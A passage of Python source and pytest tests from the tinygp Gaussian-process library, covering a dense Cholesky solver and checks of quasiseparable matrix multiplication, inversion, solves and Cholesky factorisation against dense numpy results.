covariance = construct_covariance(kernel, X, diag)
scale_tril = linalg.cholesky(covariance, lower=True)
return cls(
X=X,
variance_value=variance,
covariance_value=covariance,
scale_tril=scale_tril,
)
def variance(self) -> JAXArray:
return self.variance_value
def covariance(self) -> JAXArray:
return self.covariance_value
def normalization(self) -> JAXArray:
return jnp.sum(
jnp.log(jnp.diag(self.scale_tril))
) + 0.5 * self.scale_tril.shape[0] * np.log(2 * np.pi)
def solve_triangular(
self, y: JAXArray, *, transpose: bool = False
) -> JAXArray:
if transpose:
return linalg.solve_triangular(
self.scale_tril, y, lower=True, trans=1
)
else:
return linalg.solve_triangular(self.scale_tril, y, lower=True)
def dot_triangular(self, y: JAXArray) -> JAXArray:
return jnp.einsum("ij,j...->i...", self.scale_tril, y)
def condition(
self,
kernel: kernels.Kernel,
X_test: Optional[JAXArray],
diag: Optional[JAXArray],
) -> Any:
if X_test is None:
Ks = kernel(self.X, self.X)
if diag is None:
Kss = Ks
else:
Kss = construct_covariance(kernel, self.X, diag)
else:
if diag is None:
Kss = kernel(X_test, X_test)
else:
Kss = construct_covariance(kernel, X_test, diag)
Ks = kernel(self.X, X_test)
A = self.solve_triangular(Ks)
return Kss - A.transpose() @ A
def construct_covariance(
kernel: kernels.Kernel, X: JAXArray, diag: JAXArray
) -> JAXArray:
covariance = kernel(X, X)
covariance = covariance.at[jnp.diag_indices(covariance.shape[0])].add(diag) # type: ignore
return covariance
```
#### File: test_solvers/test_quasisep/test_core.py
```python
from itertools import combinations
import jax.numpy as jnp
import numpy as np
import pytest
from tinygp.solvers.quasisep.core import (
DiagQSM,
LowerTriQSM,
SquareQSM,
StrictLowerTriQSM,
StrictUpperTriQSM,
SymmQSM,
)
@pytest.fixture(params=["random", "celerite"])
def name(request):
return request.param
@pytest.fixture
def matrices(name):
return get_matrices(name)
@pytest.fixture
def some_nice_matrices():
diag1, p1, q1, a1, _, _, _, _ = get_matrices("celerite")
diag2, p2, q2, a2, _, _, _, _ = get_matrices("random")
mat1 = LowerTriQSM(
diag=DiagQSM(diag1),
lower=StrictLowerTriQSM(p=p1, q=q1, a=a1),
)
mat2 = SquareQSM(
diag=DiagQSM(diag2),
lower=StrictLowerTriQSM(p=p2, q=q2, a=a2),
upper=StrictUpperTriQSM(p=p2, q=q2, a=a2),
)
mat3 = SquareQSM(
diag=DiagQSM(diag1),
lower=StrictLowerTriQSM(p=p1, q=q1, a=a1),
upper=StrictUpperTriQSM(
p=jnp.zeros_like(p2), q=jnp.zeros_like(q2), a=a2
),
)
mat4 = SquareQSM(
diag=DiagQSM(diag1),
lower=StrictLowerTriQSM(p=p1, q=q1, a=a1),
upper=StrictUpperTriQSM(p=p2, q=q2, a=a2),
)
return mat1, mat2, mat3, mat4
def get_matrices(name):
N = 100
random = np.random.default_rng(1234)
diag = np.exp(random.normal(size=N))
if name == "random":
J = 5
p = random.normal(size=(N, J))
q = random.normal(size=(N, J))
a = np.repeat(np.eye(J)[None, :, :], N, axis=0)
l = np.tril(p @ q.T, -1)
u = np.triu(q @ p.T, 1)
diag += np.sum(p * q, axis=1)
elif name == "celerite":
t = np.sort(random.uniform(0, 10, N))
a = np.array([1.0, 2.5])
b = np.array([0.5, 1.5])
c = np.array([1.2, 0.5])
d = np.array([0.5, 0.1])
tau = np.abs(t[:, None] - t[None, :])[:, :, None]
K = np.sum(
np.exp(-c[None, None] * tau)
* (
a[None, None] * np.cos(d[None, None] * tau)
+ b[None, None] * np.sin(d[None, None] * tau)
),
axis=-1,
)
K[np.diag_indices_from(K)] += diag
diag = np.diag(K)
l = np.tril(K, -1)
u = np.triu(K, 1)
cos = np.cos(d[None] * t[:, None])
sin = np.sin(d[None] * t[:, None])
p = np.concatenate(
(
a[None] * cos + b[None] * sin,
a[None] * sin - b[None] * cos,
),
axis=1,
)
q = np.concatenate((cos, sin), axis=1)
c = np.append(c, c)
dt = np.append(0, np.diff(t))
a = np.stack(
[np.diag(v) for v in np.exp(-c[None] * dt[:, None])], axis=0
)
p = np.einsum("ni,nij->nj", p, a)
else:
assert False
v = random.normal(size=N)
m = random.normal(size=(N, 4))
return diag, p, q, a, v, m, l, u
def test_quasisep_def():
random = np.random.default_rng(2022)
n = 17
m1 = 3
m2 = 5
d = random.normal(size=n)
p = random.normal(size=(n, m1))
q = random.normal(size=(n, m1))
a = random.normal(size=(n, m1, m1))
g = random.normal(size=(n, m2))
h = random.normal(size=(n, m2))
b = random.normal(size=(n, m2, m2))
m = SquareQSM(
diag=DiagQSM(d=d),
lower=StrictLowerTriQSM(p=p, q=q, a=a),
upper=StrictUpperTriQSM(p=g, q=h, a=b),
).to_dense()
def get_value(i, j):
if i == j:
return d[i]
if j < i:
tmp = np.copy(q[j])
for k in range(j + 1, i):
tmp = a[k] @ tmp
return p[i] @ tmp
if j > i:
tmp = np.copy(h[i])
for k in range(i + 1, j):
tmp = tmp @ b[k].T
return tmp @ g[j]
for i in range(n):
for j in range(n):
np.testing.assert_allclose(get_value(i, j), m[i, j])
def test_strict_tri_matmul(matrices):
_, p, q, a, v, m, l, u = matrices
mat = StrictLowerTriQSM(p=p, q=q, a=a)
# Check multiplication into identity / to dense
np.testing.assert_allclose(mat.to_dense(), l)
np.testing.assert_allclose(mat.T.to_dense(), u)
# Check matvec
np.testing.assert_allclose(mat @ v, l @ v)
np.testing.assert_allclose(mat.T @ v, u @ v)
# Check matmat
np.testing.assert_allclose(mat @ m, l @ m)
np.testing.assert_allclose(mat.T @ m, u @ m)
def test_tri_matmul(matrices):
diag, p, q, a, v, m, l, _ = matrices
mat = LowerTriQSM(
diag=DiagQSM(diag), lower=StrictLowerTriQSM(p=p, q=q, a=a)
)
dense = l + np.diag(diag)
# Check multiplication into identity / to dense
np.testing.assert_allclose(mat.to_dense(), dense)
np.testing.assert_allclose(mat.T.to_dense(), dense.T)
# Check matvec
np.testing.assert_allclose(mat @ v, dense @ v)
np.testing.assert_allclose(mat.T @ v, dense.T @ v)
# Check matmat
np.testing.assert_allclose(mat @ m, dense @ m)
np.testing.assert_allclose(mat.T @ m, dense.T @ m)
@pytest.mark.parametrize("symm", [True, False])
def test_square_matmul(symm, matrices):
diag, p, q, a, v, m, l, u = matrices
if symm:
mat = SymmQSM(
diag=DiagQSM(diag), lower=StrictLowerTriQSM(p=p, q=q, a=a)
)
else:
mat = SquareQSM(
diag=DiagQSM(diag),
lower=StrictLowerTriQSM(p=p, q=q, a=a),
upper=StrictUpperTriQSM(p=p, q=q, a=a),
)
# Create and double check the dense reconstruction
dense = mat.to_dense()
np.testing.assert_allclose(np.tril(dense, -1), l)
np.testing.assert_allclose(np.triu(dense, 1), u)
np.testing.assert_allclose(np.diag(dense), diag)
# Test matmuls
np.testing.assert_allclose(mat @ v, dense @ v)
np.testing.assert_allclose(mat @ m, dense @ m)
np.testing.assert_allclose(v.T @ mat, v.T @ dense)
np.testing.assert_allclose(m.T @ mat, m.T @ dense)
@pytest.mark.parametrize("name", ["celerite"])
def test_tri_inv(matrices):
diag, p, q, a, _, _, _, _ = matrices
mat = LowerTriQSM(
diag=DiagQSM(diag), lower=StrictLowerTriQSM(p=p, q=q, a=a)
)
dense = mat.to_dense()
minv = mat.inv()
np.testing.assert_allclose(minv.to_dense(), jnp.linalg.inv(dense))
np.testing.assert_allclose(
minv.matmul(dense), np.eye(len(diag)), atol=1e-12
)
@pytest.mark.parametrize("name", ["celerite"])
def test_tri_solve(matrices):
diag, p, q, a, v, m, _, _ = matrices
mat = LowerTriQSM(
diag=DiagQSM(diag), lower=StrictLowerTriQSM(p=p, q=q, a=a)
)
dense = mat.to_dense()
np.testing.assert_allclose(mat.solve(v), np.linalg.solve(dense, v))
np.testing.assert_allclose(mat.solve(m), np.linalg.solve(dense, m))
np.testing.assert_allclose(mat.T.solve(v), np.linalg.solve(dense.T, v))
np.testing.assert_allclose(mat.T.solve(m), np.linalg.solve(dense.T, m))
np.testing.assert_allclose(mat.inv().solve(v), dense @ v)
np.testing.assert_allclose(mat.inv().solve(m), dense @ m)
np.testing.assert_allclose(mat.T.inv().solve(v), dense.T @ v)
np.testing.assert_allclose(mat.T.inv().solve(m), dense.T @ m)
@pytest.mark.parametrize("symm", [True, False])
def test_square_inv(symm, matrices):
diag, p, q, a, _, _, l, u = matrices
if symm:
mat = SymmQSM(
diag=DiagQSM(diag), lower=StrictLowerTriQSM(p=p, q=q, a=a)
)
else:
mat = SquareQSM(
diag=DiagQSM(diag),
lower=StrictLowerTriQSM(p=p, q=q, a=a),
upper=StrictUpperTriQSM(p=p, q=q, a=a),
)
# Create and double check the dense reconstruction
dense = mat.to_dense()
np.testing.assert_allclose(np.tril(dense, -1), l)
np.testing.assert_allclose(np.triu(dense, 1), u)
np.testing.assert_allclose(np.diag(dense), diag)
# Invert the QS matrix
minv = mat.inv()
np.testing.assert_allclose(
minv.to_dense(), jnp.linalg.inv(dense), rtol=2e-6
)
np.testing.assert_allclose(
minv.matmul(dense), np.eye(len(diag)), atol=1e-12
)
# In this case, we know our matrix to be symmetric - so should its inverse be!
# This may change in the future as we expand test cases
if not symm:
np.testing.assert_allclose(minv.lower.p, minv.upper.p)
np.testing.assert_allclose(minv.lower.q, minv.upper.q)
np.testing.assert_allclose(minv.lower.a, minv.upper.a)
# The inverse of the inverse should be itself... don't actually do this!
# Note: we can't actually directly compare the generators because there's
# enough degrees of freedom that they won't necessarily round trip. It's
# good enough to check that it produces the correct dense reconstruction.
mat2 = minv.inv()
np.testing.assert_allclose(mat2.to_dense(), dense, rtol=1e-4)
def test_gram(matrices):
diag, p, q, a, _, _, _, _ = matrices
mat = SquareQSM(
diag=DiagQSM(diag),
lower=StrictLowerTriQSM(p=p, q=q, a=a),
upper=StrictUpperTriQSM(p=p, q=q, a=a),
)
dense = mat.to_dense()
np.testing.assert_allclose(mat.gram().to_dense(), dense.T @ dense)
mat = mat.inv()
dense = mat.to_dense()
np.testing.assert_allclose(mat.gram().to_dense(), dense.T @ dense)
mat = SquareQSM(
diag=DiagQSM(diag),
lower=StrictLowerTriQSM(p=p, q=q, a=a),
upper=StrictUpperTriQSM(
p=jnp.zeros_like(p), q=jnp.zeros_like(q), a=jnp.zeros_like(a)
),
)
dense = mat.to_dense()
np.testing.assert_allclose(mat.gram().to_dense(), dense.T @ dense)
@pytest.mark.parametrize("name", ["celerite"])
def test_cholesky(matrices):
diag, p, q, a, v, m, _, _ = matrices
mat = SymmQSM(diag=DiagQSM(diag), lower=StrictLowerTriQSM(p=p, q=q, a=a))
dense = mat.to_dense()
chol = mat.cholesky()
np.testing.assert_allclose(chol.to_dense(), np.linalg.cholesky(dense))
mat = mat.inv()
dense = mat.to_dense()
chol = mat.cholesky()
np.testing.assert_allclose(chol.to_dense(), np.linalg.cholesky(dense))
np.testing.assert_allclose(
chol.solve(v), np.linalg.solve(chol.to_dense(), v)
)
np.testing.assert_allclose(
chol.solve(m), np.linalg.solve(chol.to_dense(), m)
)
def test_tri_qsmul(some_nice_matrices):
mat1, mat2, mat3, mat4 = some_nice_matrices
def check(mat1, mat2):
mat = mat1 @ mat2
a = mat.to_dense()
b = mat1.to_dense() @ mat2.to_dense()
np.testing.assert_allclose(np.diag(a), np.diag(b), atol=1e-12)
np.testing.assert_allclose(np.tril(a, -1), np.tril(b, -1), atol=1e-12)
np.testing.assert_allclose(np.triu(a, 1), np.triu(b, 1), atol=1e-12)
minv = mat1.inv()
mTinv = mat1.T.inv()
for m in [mat2, mat3, mat4, mat2.inv()]:
check(mat1, m)
check(minv, m)
check(mat1.T, m)
check(mTinv, m)
def test_square_qsmul(some_nice_matrices):
mat1, mat2, mat3, mat4 = some_nice_matrices
mat1 += mat1.lower.transpose()
def check(mat1, mat2):
mat = mat1 @ mat2
a = mat.to_dense()
b = mat1.to_dense() @ mat2.to_dense()
np.testing.assert_allclose(np.diag(a), np.diag(b), atol=1e-12)
np.testing.assert_allclose(np.tril(a, -1), np.tril(b, -1), atol=1e-12)
np.testing.assert_allclose(np.triu(a, 1), np.triu(b, 1), atol=1e-12)
for m1, m2 in combinations(
[mat1, mat2, mat3, mat4, mat1.inv(), mat2.inv()], 2
):
check(m1, m2)
def test_ops(some_nice_matrices):
mat1, mat2, mat3, mat4 = some_nice_matrices
def check(mat1, mat2):
for m1, m2 in combinations([mat1, mat2, mat1.lower, mat2.lower], 2):
a = m1.to_dense()
b = m2.to_dense()
np.testing.assert_allclose((-m1).to_dense(), -a, atol=1e-12)
np.testing.assert_allclose((m1 + m2).to_dense(), a + b, atol=1e-12)
np.testing.assert_allclose((m1 - m2).to_dense(), a - b, atol=1e-12)
np.testing.assert_allclose((m1 * m2).to_dense(), a * b, atol=1e-12)
np.testing.assert_allclose(
(2.5 * m1).to_dense(), 2.5 * a, atol=1e-12
)
for m1, m2 in combinations(
[mat1, mat2, mat3, mat4, mat1.inv(), mat2.inv()], 2
):
check(m1, m2)
```
#### File: test_solvers/test_quasisep/test_general.py
```python
import jax
import jax.numpy as jnp
import numpy as np
from tinygp.solvers.quasisep import kernels
from tinygp.solvers.quasisep.general import GeneralQSM
def test_matmul():
random = np.random.default_rng(1234)
x1 = np.sort(random.uniform(0, 10, 100))
x2 = np.sort(random.uniform(2, 8, 75))
kernel = kernels.Matern52(sigma=1.5, scale=3.4)
for (x1, x2) in [(x1, x2), (x1, x1), (x2, x1)]:
y = np.sin(x2)[:, None]
K = kernel(x1, x2)
idx = jnp.searchsorted(x2, x1, side="right") - 1
a = jax.vmap(kernel.A)(np.append(x2[0], x2[:-1]), x2)
ql = jax.vmap(kernel.q)(x2)
pl = jax.vmap(kernel.p)(x1)
qu = jax.vmap(kernel.q)(x1)
pu = jax.vmap(kernel.p)(x2)
i = jnp.clip(idx, 0, x2.shape[0] - 1)
pl = jax.vmap(jnp.dot)(pl, jax.vmap(kernel.A)(x2[i], x1))
i = jnp.clip(idx + 1, 0, x2.shape[0] - 1)
qu = jax.vmap(jnp.dot)(jax.vmap(kernel.A)(x1, x2[i]), qu)
mat = GeneralQSM(pl=pl, ql=ql, pu=pu, qu=qu, a=a, idx=idx)
np.testing.assert_allclose(mat.matmul(y), K @ y)
``` |
Subsets and Splits